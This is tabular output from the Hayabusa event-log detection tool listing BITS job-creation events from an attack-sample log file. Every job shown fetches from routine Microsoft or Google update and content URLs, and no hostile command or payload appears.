https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push 
Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe | URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: 
UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:01.832 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: 
http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: 
http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-21 20:50:17.148 
+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push 
Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: 
https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | 
